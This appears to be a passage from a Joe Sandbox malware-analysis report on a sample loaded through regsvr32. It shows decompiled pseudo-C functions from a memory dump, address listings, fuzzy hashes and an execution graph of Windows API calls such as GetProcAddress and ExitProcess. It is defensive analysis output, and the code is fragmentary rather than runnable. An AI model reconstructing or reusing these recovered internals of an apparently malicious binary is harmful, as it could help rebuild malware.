					}
				} else {
					L8:
					if( *0x49ff918 == 0) {
						_t46 =  *0x49ff850; // 0x4bef9f0
						 *0x49ff918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                        0x049ed218
                                                                                                                                                                        0x049ed218
                                                                                                                                                                        0x049ed218
                                                                                                                                                                        0x049ed21b
                                                                                                                                                                        0x049ed227
                                                                                                                                                                        0x049ed227
                                                                                                                                                                        0x049ed232
                                                                                                                                                                        0x049ed24e
                                                                                                                                                                        0x049ed253
                                                                                                                                                                        0x049ed25c
                                                                                                                                                                        0x049ed25e
                                                                                                                                                                        0x049ed266
                                                                                                                                                                        0x049ed287
                                                                                                                                                                        0x049ed28c
                                                                                                                                                                        0x049ed291
                                                                                                                                                                        0x049ed299
                                                                                                                                                                        0x049ed2a6
                                                                                                                                                                        0x049ed2b4
                                                                                                                                                                        0x049ed2c5
                                                                                                                                                                        0x049ed2cb
                                                                                                                                                                        0x049ed2ce
                                                                                                                                                                        0x049ed2e5
                                                                                                                                                                        0x049ed2f1
                                                                                                                                                                        0x049ed2f9
                                                                                                                                                                        0x049ed300
                                                                                                                                                                        0x049ed306
                                                                                                                                                                        0x049ed312
                                                                                                                                                                        0x049ed318
                                                                                                                                                                        0x049ed31f
                                                                                                                                                                        0x049ed332
                                                                                                                                                                        0x049ed321
                                                                                                                                                                        0x049ed321
                                                                                                                                                                        0x049ed324
                                                                                                                                                                        0x049ed32a
                                                                                                                                                                        0x049ed32f
                                                                                                                                                                        0x049ed334
                                                                                                                                                                        0x049ed33f
                                                                                                                                                                        0x049ed351
                                                                                                                                                                        0x049ed363
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed365
                                                                                                                                                                        0x049ed36c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed372
                                                                                                                                                                        0x049ed373
                                                                                                                                                                        0x049ed373
                                                                                                                                                                        0x049ed37a
                                                                                                                                                                        0x049ed37c
                                                                                                                                                                        0x049ed381
                                                                                                                                                                        0x049ed381
                                                                                                                                                                        0x049ed386
                                                                                                                                                                        0x049ed38a
                                                                                                                                                                        0x049ed38a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 7432676bab974880991e8a3fdc14a2c508b4f8f60337d7f7a3c2a250026c341d
                                                                                                                                                                        • Instruction ID: 96799c15c1b1b503c488224c623884d60ddfbae5bab2cbf4e73a4a8bf1c1dafe
                                                                                                                                                                        • Opcode Fuzzy Hash: 7432676bab974880991e8a3fdc14a2c508b4f8f60337d7f7a3c2a250026c341d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9431B5B1A042057FE711EB69EC45FBA37ECEB85318F648136F105D7180DA38EE858764
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F3674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049F3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E049F358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E049EA43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x49fcf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x49fcf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L049F8935();
				return _t29 - _t22;
			}

















                                                                                                                                                                        0x049f3674
                                                                                                                                                                        0x049f367f
                                                                                                                                                                        0x049f3686
                                                                                                                                                                        0x049f368d
                                                                                                                                                                        0x049f3693
                                                                                                                                                                        0x049f369b
                                                                                                                                                                        0x049f369c
                                                                                                                                                                        0x049f369e
                                                                                                                                                                        0x049f36a3
                                                                                                                                                                        0x049f36ab
                                                                                                                                                                        0x049f36ab
                                                                                                                                                                        0x049f36ae
                                                                                                                                                                        0x049f36b2
                                                                                                                                                                        0x049f36a5
                                                                                                                                                                        0x049f36a5
                                                                                                                                                                        0x049f36a9
                                                                                                                                                                        0x049f36ab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f36ab
                                                                                                                                                                        0x049f36a9
                                                                                                                                                                        0x049f36bb
                                                                                                                                                                        0x049f36c4
                                                                                                                                                                        0x049f36c9
                                                                                                                                                                        0x049f36cc
                                                                                                                                                                        0x049f36cf
                                                                                                                                                                        0x049f36d2
                                                                                                                                                                        0x049f36d4
                                                                                                                                                                        0x049f36d4
                                                                                                                                                                        0x049f36da
                                                                                                                                                                        0x049f36dd
                                                                                                                                                                        0x049f36e0
                                                                                                                                                                        0x049f36e3
                                                                                                                                                                        0x049f36e8
                                                                                                                                                                        0x049f36ea
                                                                                                                                                                        0x049f36ea
                                                                                                                                                                        0x049f36f0
                                                                                                                                                                        0x049f36fc
                                                                                                                                                                        0x049f36fe
                                                                                                                                                                        0x049f370a

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 049F36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 049F36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: ef272acf580fa697a18d7cffbdf626838d270d69ab5c70b2fa5421a2a10dd4bb
                                                                                                                                                                        • Instruction ID: 5eb3a00c36033a0ec9904c56e7fc7f658096b357ca592f5c10becabd21d4a952
                                                                                                                                                                        • Opcode Fuzzy Hash: ef272acf580fa697a18d7cffbdf626838d270d69ab5c70b2fa5421a2a10dd4bb
                                                                                                                                                                        • Instruction Fuzzy Hash: F8112132A0428DABCF10AFA8EC051DE7FB5FF94310B268A79DD1592281EB34E564C781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:46
                                                                                                                                                                        execution_graph 13058 5362737 13059 5362748 13058->13059 13064 5362760 13058->13064 13066 5367002 13059->13066 13063 5369c2c 2 API calls 13065 5362779 13063->13065 13089 53626b3 13064->13089 13067 5367024 13066->13067 13068 536701c 13066->13068 13069 536c307 2 API calls 13067->13069 13068->13064 13070 536702d 13069->13070 13070->13068 13096 5370e2d 13070->13096 13073 5368bf4 2 API calls 13073->13068 13076 53665f6 5 API calls 13077 536708c 13076->13077 13078 53670b1 13077->13078 13079 5367099 13077->13079 13088 53670d1 13078->13088 13115 5365e3c 13078->13115 13080 5368bf4 2 API calls 13079->13080 13080->13068 13082 5368bf4 2 API calls 13083 53670fe 13082->13083 13084 5368bf4 2 API calls 13083->13084 13086 5367047 13084->13086 13085 53670cd 13087 536aa65 6 API calls 13085->13087 13085->13088 13086->13073 13087->13088 13088->13082 13090 536c307 2 API calls 13089->13090 13091 53626c4 13090->13091 13092 53626e8 13091->13092 13093 53626db 13091->13093 13121 536ac2f 13091->13121 13092->13063 13095 5368bf4 2 API calls 13093->13095 13095->13092 13097 5370e3c 13096->13097 13098 5370e78 13096->13098 13099 5368bf4 2 API calls 13097->13099 13120 5368bde RtlAllocateHeap 13098->13120 13101 5370e45 13099->13101 13102 5367041 13101->13102 13103 5368c43 RtlAllocateHeap 13101->13103 13102->13086 13106 536979d 13102->13106 13104 5370e5c 13103->13104 13104->13102 13105 536fba1 lstrlenW 13104->13105 13105->13102 13107 5369df2 2 API calls 13106->13107 13108 53697ad 13107->13108 13109 53696f3 2 API calls 13108->13109 13110 53697cc 13109->13110 13111 5369a5a 2 API calls 13110->13111 13112 53697de 13111->13112 13113 5368baf 2 API calls 13112->13113 13114 536707a 13113->13114 13114->13068 13114->13076 13116 536b557 7 API calls 13115->13116 13117 5365e5f 13116->13117 13118 5365e77 13117->13118 13119 536b5fb 2 API calls 13117->13119 13118->13085 13119->13118 13120->13101 13122 536ac4b 6 API calls 13121->13122 13123 536ac46 13122->13123 13123->13093 15029 53659b1 15048 5369d18 15029->15048 15032 5365ab2 15034 53659e0 15034->15032 15035 5369dd8 2 API calls 15034->15035 15036 53659f8 15035->15036 15037 5369e12 2 API calls 15036->15037 15038 5365a0d 15037->15038 15039 5368b9c 2 API calls 15038->15039 15040 5365a15 15039->15040 15041 5368bf4 2 API calls 15040->15041 15042 5365a30 15041->15042 15043 536b5fb 2 API calls 15042->15043 15045 5365a3e 15043->15045 15044 536bfdb 11 API calls 15044->15045 15045->15044 15046 5365aa7 15045->15046 15047 5368bf4 2 API calls 15046->15047 15047->15032 15049 53696f3 2 API calls 15048->15049 15050 5369d39 15049->15050 15051 5369a5a 2 API calls 15050->15051 15052 53659c9 15051->15052 15052->15032 15053 5368bde RtlAllocateHeap 15052->15053 15053->15034 13132 537083c 13135 5368bde RtlAllocateHeap 13132->13135 13134 537084c 13135->13134 15082 53628a4 15083 53628ba 15082->15083 15102 5362959 15082->15102 15085 536c307 2 API calls 15083->15085 15084 5369c2c 2 API calls 15086 5362966 15084->15086 15087 53628c7 15085->15087 15104 5369d81 15087->15104 15090 5369930 2 API calls 15091 53628d5 15090->15091 15092 536109a 2 API calls 15091->15092 15091->15102 15093 53628e8 15092->15093 15094 5369a5a 2 API calls 15093->15094 15095 5362900 15094->15095 15096 5368baf 2 API calls 15095->15096 15097 536290e 15096->15097 15098 536294c 15097->15098 15099 536b5fb 2 API calls 15097->15099 15100 5368bf4 2 API calls 15098->15100 15101 536292c 15099->15101 15100->15102 15103 5368bf4 2 API calls 15101->15103 15102->15084 15103->15098 15105 5369d8a 15104->15105 15107 53628ce 15104->15107 15108 5368bde RtlAllocateHeap 15105->15108 15107->15090 15108->15107 11222 536632e 11223 536633e ExitProcess 11222->11223 13551 5361228 13552 5361242 13551->13552 13565 53611e9 13552->13565 13555 536125e 13562 5368bf4 2 API calls 13562->13555 13563 5361285 13563->13562 13566 5369dd8 2 API calls 13565->13566 13567 53611fa 13566->13567 13568 5369a07 2 API calls 13567->13568 13569 5361216 13568->13569 13570 5368b9c 2 API calls 13569->13570 13571 5361223 13570->13571 13571->13555 13572 5367b4d 13571->13572 13623 5367d9b 13572->13623 13574 536127c 13574->13563 13587 536b266 13574->13587 13575 5367b6a 13575->13574 13634 5367611 13575->13634 13577 5367b94 13586 5367b9b 13577->13586 13651 53675ab 13577->13651 13578 5368bf4 2 API calls 13579 5367bd6 13578->13579 13581 5368bf4 2 API calls 13579->13581 13582 5367be1 13581->13582 13584 5368bf4 2 API calls 13582->13584 13584->13574 13586->13578 13588 536a91d 4 API calls 13587->13588 13589 536b278 13588->13589 13590 536a065 GetSystemTimeAsFileTime 13589->13590 13591 53612a8 13590->13591 13592 5367cc2 13591->13592 13913 53703bd 13592->13913 13594 5367ce0 13595 536c295 RtlAllocateHeap 13594->13595 13596 5367ced 13595->13596 13607 5367cf7 13596->13607 13916 5368667 13596->13916 13598 5368bf4 2 API calls 13599 5367d73 13598->13599 13600 5368bf4 2 API calls 13599->13600 13602 5367d7d 13600->13602 13601 5367d0b 13603 5367611 19 API calls 13601->13603 13601->13607 13604 5368bf4 2 API calls 13602->13604 13609 5367d32 13603->13609 13605 5367d87 13604->13605 13606 5368bf4 2 API calls 13605->13606 13608 53612c2 13606->13608 13607->13598 13608->13563 13613 536111d 13608->13613 13609->13607 13610 53675ab 8 API calls 13609->13610 13611 5367d58 13610->13611 13612 53677de 18 API calls 13611->13612 13612->13607 13614 5361133 13613->13614 13615 5369edb memset 13614->13615 13622 5361187 13614->13622 13616 5361159 13615->13616 13617 536a065 GetSystemTimeAsFileTime 13616->13617 13618 536116e 13617->13618 13619 536aa91 6 API calls 13618->13619 13620 536117c 13619->13620 13621 536aa65 6 API calls 13620->13621 13621->13622 13622->13563 13663 5371152 13623->13663 13625 5367da4 13667 5368753 13625->13667 13627 5367db7 13628 5368753 strncpy 13627->13628 13629 5367dcb 13628->13629 13630 5368753 strncpy 13629->13630 13631 5367ddf 13630->13631 13671 5371bd3 13631->13671 13633 5367de7 13633->13575 13763 53674fa 13634->13763 13638 536764b 13639 5367680 13638->13639 13777 5367417 13638->13777 13640 5368bf4 2 API calls 13639->13640 13642 5367698 13640->13642 13643 5368bf4 2 API calls 13642->13643 13644 53676a3 13643->13644 13646 5368bf4 2 API calls 13644->13646 13645 5367659 13645->13639 13785 536fab4 13645->13785 13648 53676ae 13646->13648 13649 53676b8 13648->13649 13650 5368bf4 2 API calls 13648->13650 13649->13577 13650->13649 13652 536c307 2 API calls 13651->13652 13653 53675c3 13652->13653 13654 5367473 5 API calls 13653->13654 13659 53675ff 13653->13659 13655 53675e2 13654->13655 13656 5370320 lstrlenW 13655->13656 13657 53675f6 13656->13657 13658 5368ce0 lstrlenA 13657->13658 13658->13659 13660 53677de 13659->13660 13854 5371cc0 13660->13854 13662 53677f7 13662->13586 13664 537115a 13663->13664 13666 5371161 13664->13666 13676 537288e 13664->13676 13666->13625 13668 5368769 13667->13668 13670 5368764 13667->13670 13694 5371232 13668->13694 13670->13627 13672 5371be2 13671->13672 13673 5371be7 13672->13673 13706 5371b77 13672->13706 13673->13633 13675 5371c00 13675->13633 13677 53728d0 13676->13677 13678 537289d 13676->13678 13677->13666 13679 53728c1 SwitchToThread 13678->13679 13680 53728ae 13678->13680 13679->13677 13679->13679 13682 53728b7 13680->13682 13683 5372868 13680->13683 13682->13666 13688 53728f0 GetModuleHandleW 13683->13688 13685 5372875 13686 5372883 13685->13686 13693 53728d2 _time64 GetCurrentProcessId 13685->13693 13686->13682 13689 537290e GetProcAddress 13688->13689 13692 537293f 13688->13692 13690 5372922 GetProcAddress 13689->13690 13689->13692 13691 5372931 GetProcAddress 13690->13691 13690->13692 13691->13692 13692->13685 13693->13686 13695 5371264 13694->13695 13696 537123d 13694->13696 13695->13670 13696->13695 13698 5371278 13696->13698 13699 53712a6 13698->13699 13700 5371283 13698->13700 13699->13695 13700->13699 13702 5372e7a 13700->13702 13703 5372e92 13702->13703 13704 5372f19 strncpy 13703->13704 13705 5372ee5 13703->13705 13704->13705 13705->13699 13708 5371b8a 13706->13708 13707 5371ba6 13707->13675 13708->13707 13710 5371464 13708->13710 13711 5371492 13710->13711 13712 53714a4 13710->13712 13711->13712 13713 5371662 13711->13713 13714 537154f 13711->13714 13715 53714ce 13711->13715 13716 53714fe 13711->13716 13721 537152e 13711->13721 13712->13707 13719 5371c2d 2 API calls 13713->13719 13751 5371c2d _snprintf 13714->13751 13718 53714d4 _snprintf 13715->13718 13734 5373379 13716->13734 13718->13712 13723 5371691 13719->13723 13746 53719a9 13721->13746 13723->13712 13726 5371713 13723->13726 13727 5371849 13723->13727 13724 537155e 13724->13712 13725 5371464 11 API calls 13724->13725 13725->13724 13726->13712 13729 5371754 qsort 13726->13729 13727->13712 13727->13727 13728 53719a9 2 API calls 13727->13728 13730 5371464 11 API calls 13727->13730 13728->13727 13729->13712 13733 537177d 13729->13733 13730->13727 13731 53719a9 2 API calls 13731->13733 13732 5371464 11 API calls 13732->13733 13733->13712 13733->13731 13733->13732 13735 5373386 _snprintf 13734->13735 13736 5373383 13734->13736 13737 5373426 13735->13737 13738 53733af 13735->13738 13736->13735 13737->13712 13738->13737 13756 5373352 localeconv 13738->13756 13741 53733ed strchr 13741->13737 13744 5373400 13741->13744 13742 53733c9 strchr 13742->13741 13743 53733d7 13742->13743 13743->13737 13743->13741 13744->13737 13759 5368ce0 13744->13759 13747 53719bf 13746->13747 13748 5371b47 13747->13748 13749 5371ac2 _snprintf 13747->13749 13750 5371ad9 _snprintf 13747->13750 13748->13712 13749->13747 13750->13747 13753 5371c4e 13751->13753 13752 5371c55 13752->13724 13753->13752 13754 5372e7a strncpy 13753->13754 13755 5371c6b 13754->13755 13755->13724 13757 5373374 strchr 13756->13757 13758 5373362 strchr 13756->13758 13757->13741 13757->13742 13758->13757 13760 5368d01 lstrlenA 13759->13760 13762 5368d35 13760->13762 13762->13737 13762->13762 13789 5368bde RtlAllocateHeap 13763->13789 13765 5367514 13766 5367595 13765->13766 13767 537351a 2 API calls 13765->13767 13766->13649 13774 536c295 13766->13774 13768 5367538 13767->13768 13790 5367473 13768->13790 13770 536754d 13771 5370320 lstrlenW 13770->13771 13772 5367580 13771->13772 13773 5368d6d memset 13772->13773 13773->13766 13799 5368bde RtlAllocateHeap 13774->13799 13776 536c2ba 13776->13638 13778 5367428 13777->13778 13779 53696da 2 API calls 13778->13779 13780 5367444 13779->13780 13800 5368bde RtlAllocateHeap 13780->13800 13782 536744f 13783 5367469 13782->13783 13784 5369e12 2 API calls 13782->13784 13783->13645 13784->13783 13787 536fac8 13785->13787 13788 536fb0e 13787->13788 13801 536fb15 13787->13801 13788->13639 13789->13765 13791 536748c 13790->13791 13792 5361080 2 API calls 13791->13792 13793 5367499 lstrcpynA 13792->13793 13794 53674b7 13793->13794 13795 5368b9c 2 API calls 13794->13795 13796 53674c1 13795->13796 13797 5368d6d memset 13796->13797 13798 53674e6 13797->13798 13798->13770 13799->13776 13800->13782 13806 536f7a6 memset memset 13801->13806 13803 536fb41 13804 536fb64 13803->13804 13832 536f5a4 13803->13832 13804->13787 13807 5369dd8 2 API calls 13806->13807 13808 536f7fa 13807->13808 13809 5369dd8 2 API calls 13808->13809 13810 536f807 13809->13810 13811 5369dd8 2 API calls 13810->13811 13812 536f814 13811->13812 13813 5369dd8 2 API calls 13812->13813 13814 536f821 13813->13814 13815 5369dd8 2 API calls 13814->13815 13816 536f82e 13815->13816 13817 5368d6d memset 13816->13817 13818 536f842 13817->13818 13819 536f8bf GetLastError 13818->13819 13820 536fa12 13818->13820 13822 536f88c 13818->13822 13823 536f900 GetLastError 13818->13823 13826 536f958 GetLastError 13818->13826 13828 5369dd8 2 API calls 13818->13828 13829 5368b9c 2 API calls 13818->13829 13830 536a065 GetSystemTimeAsFileTime 13818->13830 13831 536f9d2 GetLastError 13818->13831 13848 536f6ec 13818->13848 13819->13818 13821 5368d6d memset 13820->13821 13820->13822 13824 536fa34 13821->13824 13822->13803 13823->13818 13824->13822 13825 536fa50 GetLastError 13824->13825 13825->13822 13826->13818 13828->13818 13829->13818 13830->13818 13831->13818 13833 536f5c1 13832->13833 13852 5368bde RtlAllocateHeap 13833->13852 13835 536f5d6 13847 536f5df 13835->13847 13853 5368bde RtlAllocateHeap 13835->13853 13837 536f5ef 13840 536f6b2 13837->13840 13842 536f68c GetLastError 13837->13842 13845 536a065 GetSystemTimeAsFileTime 13837->13845 13846 5368c72 3 API calls 13837->13846 13837->13847 13838 5368bf4 2 API calls 13838->13840 13839 536f6ca 13839->13804 13840->13839 13841 5368bf4 2 API calls 13840->13841 13841->13839 13843 536f698 13842->13843 13842->13847 13844 536a065 GetSystemTimeAsFileTime 13843->13844 13844->13847 13845->13837 13846->13837 13847->13838 13847->13840 13849 536f70e 13848->13849 13850 536f733 GetLastError 13849->13850 13851 536f72e 13849->13851 13850->13851 13851->13818 13852->13835 13853->13837 13855 5371d13 13854->13855 13856 5371ccd 13854->13856 13855->13662 13856->13855 13859 537240b 13856->13859 13858 5371d00 13858->13662 13866 5371e0e 13859->13866 13861 5372422 13865 5372449 13861->13865 13870 537257f 13861->13870 13863 5372440 13864 5371e0e 8 API calls 13863->13864 13863->13865 13864->13865 13865->13858 13867 5371e20 13866->13867 13869 5371e59 13867->13869 13880 5371fad 13867->13880 13869->13861 13871 5372596 13870->13871 13872 53725e0 13870->13872 13871->13872 13873 5372606 13871->13873 13874 53725b2 13871->13874 13872->13863 13906 537238b 13873->13906 13875 53725b7 13874->13875 13876 53725f5 13874->13876 13875->13872 13879 53725c8 memchr 13875->13879 13896 537247c 13876->13896 13879->13872 13881 5371fc7 13880->13881 13882 5371fec 13881->13882 13883 5372081 13881->13883 13884 5372036 13881->13884 13882->13869 13883->13882 13887 5373439 13883->13887 13886 5372046 _errno _strtoi64 _errno 13884->13886 13886->13882 13893 537349d localeconv 13887->13893 13890 5373471 13891 5373480 _errno 13890->13891 13892 537348c 13890->13892 13891->13892 13892->13882 13894 5373448 _errno strtod 13893->13894 13895 53734ad strchr 13893->13895 13894->13890 13894->13891 13895->13894 13897 5371152 7 API calls 13896->13897 13898 5372488 13897->13898 13899 5371e0e 8 API calls 13898->13899 13905 53724aa 13898->13905 13904 537249e 13899->13904 13900 53724c7 memchr 13900->13904 13900->13905 13901 5371e0e 8 API calls 13901->13904 13902 537257f 17 API calls 13902->13904 13903 5371278 strncpy 13903->13904 13904->13900 13904->13901 13904->13902 13904->13903 13904->13905 13905->13872 13907 5372394 13906->13907 13908 53723af 13907->13908 13909 5371e0e 8 API calls 13907->13909 13908->13872 13911 53723a7 13909->13911 13910 537257f 18 API calls 13910->13911 13911->13908 13911->13910 13912 5371e0e 8 API calls 13911->13912 13912->13911 13914 53703dd GetTickCount 13913->13914 13915 53703cc __aulldiv 13913->13915 13914->13594 13915->13594 13917 5371152 7 API calls 13916->13917 13918 5368676 13917->13918 13919 5368753 strncpy 13918->13919 13920 536868c 13919->13920 13921 5368753 strncpy 13920->13921 13922 53686a0 13921->13922 13923 5368753 strncpy 13922->13923 13924 53686b1 13923->13924 13925 5368753 strncpy 13924->13925 13926 53686c2 13925->13926 13927 5368753 strncpy 13926->13927 13928 53686d7 13927->13928 13929 5368753 strncpy 13928->13929 13930 53686ec 13929->13930 13931 5368753 strncpy 13930->13931 13932 5368702 13931->13932 13933 5371bd3 13 API calls 13932->13933 13934 536870a 13933->13934 13934->13601 13971 536201c 13972 536204f 13971->13972 13996 5362047 13971->13996 13973 5369930 2 API calls 13972->13973 13974 536205f 13973->13974 13981 5362094 13974->13981 14003 5369aaf 13974->14003 13976 53696f3 2 API calls 13978 53620b2 13976->13978 13979 536c307 2 API calls 13978->13979 13982 53620c4 13979->13982 13980 5369930 2 API calls 13980->13981 13981->13976 13983 53620cb 13982->13983 14010 536c0aa memset 13982->14010 13985 5368bf4 2 API calls 13983->13985 13986 5362242 13985->13986 13987 5368bf4 2 API calls 13986->13987 13988 536224d 13987->13988 13989 5368bf4 2 API calls 13988->13989 13997 5362259 13989->13997 13990 5362281 13993 5369c2c 2 API calls 13990->13993 13991 5369a5a RtlAllocateHeap lstrcatW 14001 53620db 13991->14001 13992 5362276 13995 5368bf4 2 API calls 13992->13995 13993->13996 13994 5368bf4 2 API calls 13994->13997 13995->13990 13997->13990 13997->13992 13997->13994 13998 5369df2 lstrlenA RtlAllocateHeap 13998->14001 13999 5368baf HeapFree memset 13999->14001 14000 536b5fb memset GetExitCodeProcess 14000->14001 14001->13983 14001->13991 14001->13998 14001->13999 14001->14000 14002 5368bf4 HeapFree memset 14001->14002 14002->14001 14004 5369ac6 14003->14004 14025 5368bde RtlAllocateHeap 14004->14025 14006 5369b07 lstrcatA 14008 5369afc 14006->14008 14009 5369b1b lstrcatA 14006->14009 14007 536207d 14007->13980 14007->13996 14008->14006 14008->14007 14009->14008 14026 5368bde RtlAllocateHeap 14010->14026 14012 536c0d1 14013 53698bd RtlAllocateHeap 14012->14013 14024 536c155 14012->14024 14014 536c0ef 14013->14014 14015 53698bd RtlAllocateHeap 14014->14015 14016 536c102 14015->14016 14017 53698bd RtlAllocateHeap 14016->14017 14018 536c116 14017->14018 14019 5369df2 2 API calls 14018->14019 14020 536c123 14019->14020 14021 5368baf 2 API calls 14020->14021 14022 536c149 14021->14022 14023 53698bd RtlAllocateHeap 14022->14023 14023->14024 14024->14001 14025->14008 14026->14012 14040 5361301 14041 536a91d 4 API calls 14040->14041 14042 5361318 14041->14042 14043 536133d 14042->14043 14044 5373674 2 API calls 14042->14044 14045 53611e9 5 API calls 14043->14045 14044->14043 14046 5361366 14045->14046 14047 536a9f0 4 API calls 14046->14047 14066 5361372 14046->14066 14048 5361382 14047->14048 14049 5367b4d 50 API calls 14048->14049 14077 5361440 14048->14077 14051 53613a0 14049->14051 14050 536b179 4 API calls 14052 5361457 14050->14052 14057 536a9f0 4 API calls 14051->14057 14060 53613a9 14051->14060 14070 53613dd 14051->14070 14053 536b266 5 API calls 14052->14053 14054 5361463 14053->14054 14242 53679c0 14054->14242 14056 536b179 4 API calls 14059 53613f9 14056->14059 14061 53613d4 14057->14061 14065 536b266 5 API calls 14059->14065 14062 5368bf4 2 API calls 14060->14062 14061->14070 14078 536687d 14061->14078 14062->14066 14063 53614aa 14063->14060 14073 536111d 8 API calls 14063->14073 14064 5361498 14067 536111d 8 API calls 14064->14067 14068 5361405 14065->14068 14071 53614a4 14067->14071 14225 5367bf5 14068->14225 14070->14056 14267 53610ec 14071->14267 14073->14071 14077->14050 14275 5368bde RtlAllocateHeap 14078->14275 14080 5366893 14081 536a96c 4 API calls 14080->14081 14177 5366d6c 14080->14177 14082 53668a8 14081->14082 14276 536fbdb 14082->14276 14087 53698bd RtlAllocateHeap 14088 53668cc 14087->14088 14089 53698bd RtlAllocateHeap 14088->14089 14090 53668e0 14089->14090 14091 5366905 14090->14091 14092 53698bd RtlAllocateHeap 14090->14092 14093 53698bd RtlAllocateHeap 14091->14093 14092->14091 14094 536692a 14093->14094 14302 536e7c6 14094->14302 14100 5366996 14101 536109a 2 API calls 14100->14101 14102 53669c3 14101->14102 14103 536109a 2 API calls 14102->14103 14104 53669d2 14103->14104 14105 536109a 2 API calls 14104->14105 14106 53669e1 14105->14106 14107 536109a 2 API calls 14106->14107 14108 53669ee 14107->14108 14109 536109a 2 API calls 14108->14109 14110 53669ff 14109->14110 14111 536109a 2 API calls 14110->14111 14112 5366a10 14111->14112 14113 5369e51 2 API calls 14112->14113 14114 5366a32 14113->14114 14115 536109a 2 API calls 14114->14115 14116 5366a3c 14115->14116 14117 536109a 2 API calls 14116->14117 14118 5366a4c 14117->14118 14119 536109a 2 API calls 14118->14119 14120 5366a5b 14119->14120 14121 536109a 2 API calls 14120->14121 14122 5366a6a 14121->14122 14123 536109a 2 API calls 14122->14123 14124 5366a79 14123->14124 14125 536109a 2 API calls 14124->14125 14126 5366a88 14125->14126 14356 536b6ae 14126->14356 14129 536b6ae 5 API calls 14130 5366aa5 14129->14130 14131 536b6ae 5 API calls 14130->14131 14132 5366ab5 14131->14132 14133 536b6ae 5 API calls 14132->14133 14134 5366ac5 14133->14134 14135 536b6ae 5 API calls 14134->14135 14136 5366ad2 14135->14136 14137 5366af1 14136->14137 14138 536b6ae 5 API calls 14136->14138 14139 536b6ae 5 API calls 14137->14139 14138->14137 14140 5366aff 14139->14140 14141 536b6ae 5 API calls 14140->14141 14142 5366b0d 14141->14142 14143 536b6ae 5 API calls 14142->14143 14144 5366b1b 14143->14144 14145 536b6ae 5 API calls 14144->14145 14146 5366b29 14145->14146 14147 536b6ae 5 API calls 14146->14147 14148 5366b37 14147->14148 14149 536b6ae 5 API calls 14148->14149 14150 5366b45 14149->14150 14151 5368baf 2 API calls 14150->14151 14152 5366b54 14151->14152 14153 5368baf 2 API calls 14152->14153 14154 5366b5e 14153->14154 14155 5368baf 2 API calls 14154->14155 14156 5366b68 14155->14156 14157 5368baf 2 API calls 14156->14157 14158 5366b72 14157->14158 14159 5368baf 2 API calls 14158->14159 14160 5366b7c 14159->14160 14161 5368baf 2 API calls 14160->14161 14162 5366b86 14161->14162 14163 5368baf 2 API calls 14162->14163 14164 5366b90 14163->14164 14165 5368baf 2 API calls 14164->14165 14166 5366b9a 14165->14166 14167 5368baf 2 API calls 14166->14167 14168 5366ba4 14167->14168 14169 5368baf 2 API calls 14168->14169 14170 5366bae 14169->14170 14171 5368baf 2 API calls 14170->14171 14172 5366bb8 14171->14172 14173 5368baf 2 API calls 14172->14173 14174 5366bc2 14173->14174 14374 5368bde RtlAllocateHeap 14174->14374 14176 